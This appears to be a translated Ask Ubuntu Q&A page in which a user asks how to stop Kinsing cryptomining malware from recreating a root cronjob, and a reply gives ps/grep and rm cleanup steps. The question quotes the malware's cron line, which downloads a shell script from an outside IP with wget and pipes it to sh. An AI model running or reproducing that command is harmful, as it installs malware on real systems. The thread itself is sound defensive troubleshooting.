那些遇到过的问题

无法阻止 Kinsing 恶意软件创建 cronjob

And*_*DAG 5 18.04

所以基本上我的新服务器已经感染了加密挖矿恶意软件 Kinsing。尽管我遵循了此处的所有说明但似乎仍然无法阻止恶意软件在我的根 crontab 中创建此行:

* * * * * wget -q -O - http://195.3.146.118/sc.sh | sh > /dev/null 2>&1
Run Code Online (Sandbox Code Playgroud)

这实际上是用恶意项目和r01.egg文件感染我的 Scrapyd 守护进程。

目前没有活动进程正在生成,并且似乎没有恶意软件的活动。这可能是因为我已经锁定了之前链接的资源所指示的具有受限权限的文件。

如何停止 cronjob 开始?它似乎每天至少生成两次,甚至更多。

谢谢,

小智 2

Step1 获取PID并杀死它们

ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi
Run Code Online (Sandbox Code Playgroud)

Step2 删除文件

rm -f /tmp/kdevtmfsi
Run Code Online (Sandbox Code Playgroud)

归档时间:

查看次数:

1651 次

最近记录:

5 年 前
相关归档
无法安装“<PACKAGE>”:快照“<PACKAGE>”正在进行“install-snap”更改 115
如何更新 sudo 软件包版本? 19
恢复后防止窗口调整大小 10
蓝牙不工作 ubuntu 18.04 9
访问 *.doc 被拒绝 | 自由办公室 5.4.5.1 8
Chromium/Opera“随机”不在 i3 中渲染 7
如何设置 systemd-resolved 的搜索路径? 5
如何在 18.04 上完全重置网络设置? 5
将 Xubuntu 18.04 升级到 20.04 5
从 ubuntu 18.04 卸载 kubuntu-desktop 4
难疑归档
如何录制我的屏幕? 589
如果有空闲 RAM,如何清空交换区? 411
如何提高 Ubuntu 的整体系统性能? 354
如何为 Java 设置 JAVA_HOME? 352
如何停止在启动时提示解锁“默认”钥匙圈? 344
如何创建 Wi-Fi 热点(在接入点模式下)? 169
我能看到为什么安装了一个包吗? 146
未选择仅主机适配器 131
为什么 su 因“身份验证错误”而失败? 123
如何检查 deb 包的依赖项列表 119